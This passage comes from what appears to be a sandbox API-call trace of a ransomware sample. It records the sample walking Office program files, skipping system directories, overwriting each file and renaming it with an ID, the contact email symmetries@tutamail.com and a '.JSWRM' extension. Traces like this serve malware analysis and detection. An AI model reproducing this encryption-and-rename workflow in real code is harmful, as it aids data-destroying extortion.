lpOverlapped=0x0) returned 1 [0138.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0138.558] CloseHandle (hObject=0x238) returned 1 [0138.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0138.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0138.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0138.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0138.558] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0138.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0138.558] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0138.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0138.558] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.558] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL083.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl083.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL083.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl083.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0138.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0138.560] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0138.560] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d3659fb, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d3659fb, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d3659fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa88e4, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL086.XML", cAlternateFileName="")) returned 1 [0138.560] lstrcmpiW (lpString1="PGLBL086.XML", lpString2=".") returned 1 [0138.561] lstrcmpiW (lpString1="PGLBL086.XML", lpString2="..") returned 1 [0138.561] lstrcmpiW (lpString1="PGLBL086.XML", lpString2="...") returned 1 [0138.561] lstrcmpiW (lpString1="PGLBL086.XML", lpString2="windows") returned -1 [0138.561] lstrcmpiW (lpString1="PGLBL086.XML", lpString2="recovery") returned -1 [0138.561] lstrcmpiW (lpString1="PGLBL086.XML", lpString2="perflogs") returned 1 [0138.561] lstrcmpiW (lpString1="PGLBL086.XML", lpString2="documents and settings") returned 1 [0138.561] lstrcmpiW (lpString1="PGLBL086.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.561] lstrcmpiW (lpString1="PGLBL086.XML", lpString2="system volume information") returned -1 [0138.561] lstrcmpiW (lpString1="PGLBL086.XML", lpString2="msocache") returned 1 [0138.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0138.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL086.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL086.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL086.XML", lpUsedDefaultChar=0x0) returned 12 [0138.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0138.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0138.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL086.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL086.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL086.XML", lpUsedDefaultChar=0x0) returned 12 [0138.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0138.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0138.561] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0138.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.561] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.561] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0138.561] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL086.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl086.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.563] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=690404) returned 1 [0138.563] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.563] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x2501e8 [0138.563] ReadFile (in: hFile=0x238, lpBuffer=0x2501e8, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0138.578] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.578] WriteFile (in: hFile=0x238, lpBuffer=0x2501e8*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x2501e8*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0138.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2501e8 | out: hHeap=0x1e0000) returned 1 [0138.579] CloseHandle (hObject=0x238) returned 1 [0138.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0138.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0138.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0138.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0138.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0138.579] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0138.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0138.579] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247e68 [0138.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0138.579] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0138.579] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL086.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl086.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL086.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl086.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247e68 | out: hHeap=0x1e0000) returned 1 [0138.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0138.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0138.581] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d33f7b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d33f7b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d33f7b2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x13d8, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL087.XML", cAlternateFileName="")) returned 1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2=".") returned 1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2="..") returned 1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2="...") returned 1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2="windows") returned -1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2="recovery") returned -1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2="perflogs") returned 1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2="documents and settings") returned 1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2="system volume information") returned -1 [0138.581] lstrcmpiW (lpString1="PGLBL087.XML", lpString2="msocache") returned 1 [0138.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0138.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL087.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL087.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL087.XML", lpUsedDefaultChar=0x0) returned 12 [0138.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0138.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0138.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL087.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL087.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL087.XML", lpUsedDefaultChar=0x0) returned 12 [0138.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0138.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210580 [0138.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0138.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0138.581] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL087.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl087.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.582] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=5080) returned 1 [0138.582] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x13d0) returned 0x27b348 [0138.583] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0x13d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0x13d0, lpOverlapped=0x0) returned 1 [0138.584] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.584] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0x13d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0x13d0, lpOverlapped=0x0) returned 1 [0138.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0138.585] CloseHandle (hObject=0x238) returned 1 [0138.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2101f0 [0138.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0138.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a438 [0138.585] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a438, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a438 | out: hHeap=0x1e0000) returned 1 [0138.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0138.585] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247898 [0138.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0138.585] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0138.585] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL087.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl087.xml"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL087.XML.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl087.xml.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0138.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247898 | out: hHeap=0x1e0000) returned 1 [0138.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2101f0 | out: hHeap=0x1e0000) returned 1 [0138.586] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0138.586] FindNextFileW (in: hFindFile=0x231ec0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x1d33f7b2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x1d33f7b2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x1d3659fb, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xb532, dwReserved0=0xf12e0, dwReserved1=0x0, cFileName="PGLBL089.XML", cAlternateFileName="")) returned 1 [0138.586] lstrcmpiW (lpString1="PGLBL089.XML", lpString2=".") returned 1 [0138.586] lstrcmpiW (lpString1="PGLBL089.XML", lpString2="..") returned 1 [0138.586] lstrcmpiW (lpString1="PGLBL089.XML", lpString2="...") returned 1 [0138.586] lstrcmpiW (lpString1="PGLBL089.XML", lpString2="windows") returned -1 [0138.586] lstrcmpiW (lpString1="PGLBL089.XML", lpString2="recovery") returned -1 [0138.586] lstrcmpiW (lpString1="PGLBL089.XML", lpString2="perflogs") returned 1 [0138.586] lstrcmpiW (lpString1="PGLBL089.XML", lpString2="documents and settings") returned 1 [0138.586] lstrcmpiW (lpString1="PGLBL089.XML", lpString2="$RECYCLE.BIN") returned 1 [0138.586] lstrcmpiW (lpString1="PGLBL089.XML", lpString2="system volume information") returned -1 [0138.587] lstrcmpiW (lpString1="PGLBL089.XML", lpString2="msocache") returned 1 [0138.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0138.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL089.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL089.XML", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL089.XML", lpUsedDefaultChar=0x0) returned 12 [0138.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0138.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0138.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL089.XML", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0138.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="PGLBL089.XML", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="PGLBL089.XML", lpUsedDefaultChar=0x0) returned 12 [0138.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0138.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0138.587] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210580 | out: hHeap=0x1e0000) returned 1 [0138.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0138.587] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0138.587] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0138.587] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL089.XML" (normalized: "c:\\program files\\microsoft office\\root\\office16\\pagesize\\pglbl089.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x238 [0138.588] GetFileSizeEx (in: hFile=0x238, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=46386) returned 1 [0138.588] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.588] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb530) returned 0x27b348 [0138.588] ReadFile (in: hFile=0x238, lpBuffer=0x27b348, nNumberOfBytesToRead=0xb530, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesRead=0x345e89c*=0xb530, lpOverlapped=0x0) returned 1 [0138.592] SetFilePointer (in: hFile=0x238, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0138.592] WriteFile (in: hFile=0x238, lpBuffer=0x27b348*, nNumberOfBytesToWrite=0xb530, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x27b348*, lpNumberOfBytesWritten=0x345e898*=0xb530, lpOverlapped=0x0) returned 1 [0138.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x27b348 | out: hHeap=0x1e0000) returned 1 [0138.592] CloseHandle (hObject=0x238) returned 1 [0138.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0138.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0138.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0138.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0138.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0138.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0138.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0138.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0138.592] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0138.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0138.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0138.592] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2472c8 [0138.592] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0138.593] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0138.593] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\PAGESIZE\\PGLBL089.XML" (normalized: 